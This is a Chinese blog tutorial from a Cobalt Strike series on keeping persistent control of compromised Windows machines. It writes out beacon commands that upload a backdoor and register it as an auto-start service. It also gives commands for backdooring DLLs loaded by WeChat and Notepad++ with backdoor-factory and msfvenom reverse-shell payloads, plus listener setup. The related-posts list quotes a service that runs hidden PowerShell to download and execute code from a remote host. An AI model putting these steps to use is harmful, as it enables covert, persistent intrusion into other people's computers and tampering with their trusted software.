Cobaltstrike系列教程(十三)控制持久化

已于 2023-02-15 13:23:17 修改
阅读量5.4k 收藏 21
点赞数 4
分类专栏: 网络安全 神兵利器 文章标签: 安全 web安全 网络
于 2020-01-19 21:41:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26091745/article/details/104045449
版权

0x000-前文

有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以咨询我

2000人网络安全交流群,欢迎大佬们来玩
群号820783253

0x001-右键菜单实现控制持久化

在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。
目前常见的手法有:

1.注册表
2.启动项
3.计时任务
4.设置服务
5.shift后门
6.dll劫持(白加黑)
7.利用其他安装的软件

在我之前给出的插件中,已经包含了控制持久化的插件
如图,里面包含了很多控制持久化的方法,可自动执行
在这里插入图片描述
前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化
Sticky Keys是大家熟悉的粘滞键后门(shift后门,摁五下shift弹出cmd窗口)
Scheduled Job方法为写计划任务维持权限
最后一个我也没整明白什么意思,大牛们知道嘛?
利用这个菜单实现控制持久化虽然方便,但是存在一定的局限,也有很多问题,下面简单讲两种个人常用的维持权限的方法

0x002-Windows Service维持权限

在cobaltstrike中生成一个Windows service服务后门
在这里插入图片描述
导出时后门名为beacon.exe
在这里插入图片描述
随后在beacon中执行如下命令

beacon> cd C:\WINDOWS\Temp\
[] cd C:\WINDOWS\Temp\
[+] host called home, sent: 24 bytes

beacon> upload /root/beacon.exe
[] Tasked beacon to upload /root/beacon.exe as beacon.exe
[+] host called home, sent: 309782 bytes
beacon> shell sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[] Tasked beacon to run: sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[+] host called home, sent: 93 bytes
[+] received output:
[SC] CreateService 成功

beacon> shell sc description "thisisserver" "description"
[] Tasked beacon to run: sc description "thisisserver" "description"
[+] host called home, sent: 74 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功

beacon> shell sc config "thisisserver" start= auto
[] Tasked beacon to run: sc config "thisisserver" start= auto
[+] host called home, sent: 67 bytes
[+] received output:
[SC] ChangeServiceConfig 成功

beacon> shell net start "thisisserver"
[] Tasked beacon to run: net start "thisisserver"
[+] host called home, sent: 55 bytes*

这样的话目标机每次开机,都会运行你的beacon.exe后门,实现控制的持久化。
当然,如果目标主机存在杀毒全家桶的话,那么对你后门的免杀是有很高要求的,至于cobaltstrike后门的免杀,打算过一段时间做个番外篇讲,老铁们可以关注下~

0x003-dll劫持(白加黑)维持权限

Dll劫持的话,主要是劫持那些经常运行程序的dll,这样程序一运行,就会加载我们的恶意dll。实现控制持久化

我们来看一个例子,劫持微信的dll

首先使用Process Explore查看微信调用的dll
在这里插入图片描述
本次测试,是劫持的他的d3dcompiler_47.dll
使用backdoor factory制作dll后门(保存在目录的backdoored文件夹下)
链接:https://github.com/secretsquirrel/the-backdoor-factory
命令如下

python backdoor.py -f d3dcompiler_47.dll -s reverse_shell_tcp_inline -P 6666 -H 8.8.8.8(你的teamserver)

在这里插入图片描述
把这个加了后门的dll放到微信程序的文件夹下
用cobaltstrike配置一个tcp协议监听6666端口的Listener,或者nc监听6666端口,目标机运行微信时,即可收到反弹的shell

再看一个,劫持notepad的dll:
我们首先打开Kali,用Metasploit或者cobaltstrike来生成一个dll木马

Metasploit生成dll后门命令

msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.199.107 lport=6666 -f dll > ./Msimg32.dll

Cobaltstrike生成dll后门方法

在这里插入图片描述
然后配置6666端口的监听
Metasploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.107
set lport 6666
exploit

Cobaltstrike配置监听
请看教程第二节

然后我们把dll放到notepad文件夹中,运行notpad++,即可返回会话。

在这里插入图片描述

0x004-小福利

分享一下今天刚刚买的1000多套PPT模板,有了这些模板,做课件轻轻松松~
回复即可下载
在这里插入图片描述
链接:https://pan.baidu.com/s/1SGCyFtuQsd0yzKAIMvRLyQ
提取码:6x55

J0o1ey
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
51-4 权限维持1 - cobalt strike(CS)
weixin_43263566的博客
07-04 41
老师讲的内容没有我之前写得那么详细,因此这篇就不需要写了,可以直接看我之前写的。
cobaltstrike权限维持
weixin_45682070的博客
06-13 1625
权限维持:简单来说就是让我们可以更久的控制一台电脑 生成监听后门:提权之后我们要创建一个监听后门 shell sc create "ALGS" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.17.142:80/a'))\" #生成一个ALGS服务 shell SC config "ALGS" start= au
cobaltstrike安装_Cobaltstrike系列教程(十三)控制持久化
weixin_39964833的博客
11-30 957
0x001-右键菜单实现控制持久化在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。目前常见的手法有:1.注册表2.启动项3.计时任务4.设置服务5.shift后门6.dll劫持(白加黑)7.利用其他安装的软件在之前给出的插件中,已经包含了控制持久化的插件如图,里面包含了很多控制持久化的方法,可自动执行前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化...
Cobalt Strike DLL用于永恒之蓝注入
最新发布
qq_69775412的博客
06-25 303
我们在对存在MS17010的漏洞主机进⾏DLL注⼊的时候,⼀般都是⽤的Meataploit的msf venom⽣成出来的,所以每次上线之 后基本都是要经过相对⽐较繁琐的操作之后转到Cobalt Strike去,这样就会显得⾮常⿇烦。转化命令:msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o shell.dll。生成文件后,打开msf,用命令将这个bin文件转化为dll文件。
CobaltStrike 上线到权限维持
Nocker888的博客
05-10 1409
CobaltStrike 上线到权限维持 Win系统上常用计划任务或注册表自启动,或者 ”白+黑” 的方法来达到权限维持的目的 自启动服务 前情提要: 权限要求:system权限 准备免杀马子,上传自定义路径 sc create "GoGo" binpath= "C:\Users\Arks7\Desktop\BypassMM\Exp.exe(路径)" sc description "GoGo" "360SB" sc config "GoGo" start= auto net start "GoGo"
Cobalt Strike Persistence:深度剖析高级持久性威胁工具
gitblog_00011的博客
04-06 514
Cobalt Strike Persistence:深度剖析高级持久性威胁工具 项目地址:https://gitcode.com/Cyri1s/cobalt-strike-persistence 在网络安全领域,了解和防范高级持久性威胁(Advanced Persistent Threat, APT)至关重要。Cobalt Strike 是一个知名的渗透测试工具,它模拟APT攻击,帮助安全专家测试...
CS插件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 1512
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视化操作(强烈建议使用白名单进程进行操作)。
Redis教程(十):持久化详解
12-16
教程将深入讲解Redis的持久化方法,包括RDB(Redis Database,数据集快照)和AOF(Append Only File,追加日志)。 一、Redis持久化机制 1. **RDB持久化**:RDB持久化是通过定期保存内存中的数据集快照到磁盘来...
cobalt strike 4.7
06-07
为了充分利用Cobalt Strike 4.7,使用者需要对网络攻击的生命周期有深入理解,包括侦察、持久化、权限提升、防御规避、凭证访问、横向移动、收集和外联。此外,熟悉相关的操作系统和网络协议知识,以及基本的编程和...
CobaltStrike4.1
03-10
三、Cobalt Strike的组件 1. **Team Server**:是Cobalt Strike的核心,负责管理Beacon会话、存储数据和执行任务。 2. **Beacon**:是植入到目标系统中的轻量级代理,用于执行命令、收集信息和进行横向移动。 3. **...
BadUSB简单免杀一秒上线CobaltStrike.pdf
03-24
BadUSB简单免杀一秒上线CobaltStrike.pdf
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 881
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集...
我的渗透笔记之cobaltstrike的提权以及维持权限
xf555er的博客
03-16 4643
一、cobaltstrike的提权: 提权:简单来说就是将用户的操作权限提升至系统权限 操作: 下面这张图的权限为用户权限 点击提权后,选择提供的exp,过一会就会出现系统权限的shell 二、权限的维持: 权限维持:简单来说就是让我们可以更久的控制一台电脑 操作: 1、创建监听后,我们要创建一个后门,在这里我们利用脚本攻击演示一下。 2、设置开机后自动启动脚本后门,点击目标中执行be...
Cobalt Strike使用教程——实战篇
Captain_RB的博客
06-10 5756
本文主要介绍实战中 **Cobalt Strike** 4.3 的常用操作,包括Malleable C2配置与分析、监听器和Beacon Payload配置与区别、进程注入与欺骗、与MSF联动以及插件使用方法。
Cobaltstrike系列教程(十)安装扩展
J0o1ey Blog
03-25 1万+
0x001-扩展的加载 扩展是Cobaltstrike一个极为重要的模块,它有效地丰盈了cobaltstrike的功能 选择菜单栏的CobaltStrike–>脚本管理器,点击load,然后选择cna扩展文件即可,旁边的unload为去除该扩展...
Cobalt Strike使用教程
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
【内网安全Cobalt Strike 使用
qq_44657899的博客
07-12 2283
文章目录Beacon命令argue参数污染 Beacon命令 argue参数污染 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Argue execute net1 user test test123 /add execute net1 localgroup administrators test /add argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [com
Cobalt Strike详细使用教程
小小猪的博客
12-16 7053
Cobalt Strike详细使用教程 Cobalt Strike安装教程这里就不在赘述了 Cobalt Strike安装教程 监听器 listner: 创建监听器 Add 添加新的监听 edit 编辑已有监听 remove 删除监听 restart 重启监听 要添加监听器可以点击Add,这里的监听器根据所通过的协议和监听器位置分为8种 不同监听介绍: 1.beacon dns 2.beacon http 3.beacon https 4.beacon smb 5.bea..
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

J0o1ey

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值